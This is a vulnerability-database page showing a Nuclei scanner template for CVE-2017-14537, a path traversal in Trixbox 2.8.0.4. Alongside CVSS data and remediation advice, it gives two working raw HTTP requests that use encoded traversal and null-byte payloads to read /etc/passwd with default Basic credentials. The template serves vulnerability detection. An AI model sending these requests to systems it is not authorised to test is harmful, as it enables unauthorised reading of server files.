Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-14537
HistorySep 04, 2020 - 4:26 a.m.

Trixbox 2.8.0 - Path Traversal

2020-09-0404:26:20
ProjectDiscovery
github.com
5
cve2017
trixbox
lfi
packetstorm
netfortris

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.01

Percentile

83.7%

Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.

id: CVE-2017-14537

info:
  name: Trixbox 2.8.0 - Path Traversal
  author: pikpikcu
  severity: medium
  description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.
  reference:
    - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-14537
    - https://sourceforge.net/projects/asteriskathome/
    - http://packetstormsecurity.com/files/162853/Trixbox-2.8.0.4-Path-Traversal.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2017-14537
    cwe-id: CWE-22
    epss-score: 0.01002
    epss-percentile: 0.81968
    cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: netfortris
    product: trixbox
  tags: cve,cve2017,trixbox,lfi,packetstorm,netfortris

http:
  - raw:
      - |
        POST /maint/index.php?packages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/maint/index.php?packages
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=

        xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
      - |
        GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Referer: {{Hostname}}/maint/index.php?packages
        Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
        Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dfdc6074c62d2b9fa504221e526fa86d4918ccb5fa03a6d416b7c3e3db979398022100befa0ade8449e62b774fab5bf32a5397402c437966bb993ac5f882d24bedab9d:922c64590222798bb761d5b6d8e72950

CVSS2

4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.01

Percentile

83.7%

Related for NUCLEI:CVE-2017-14537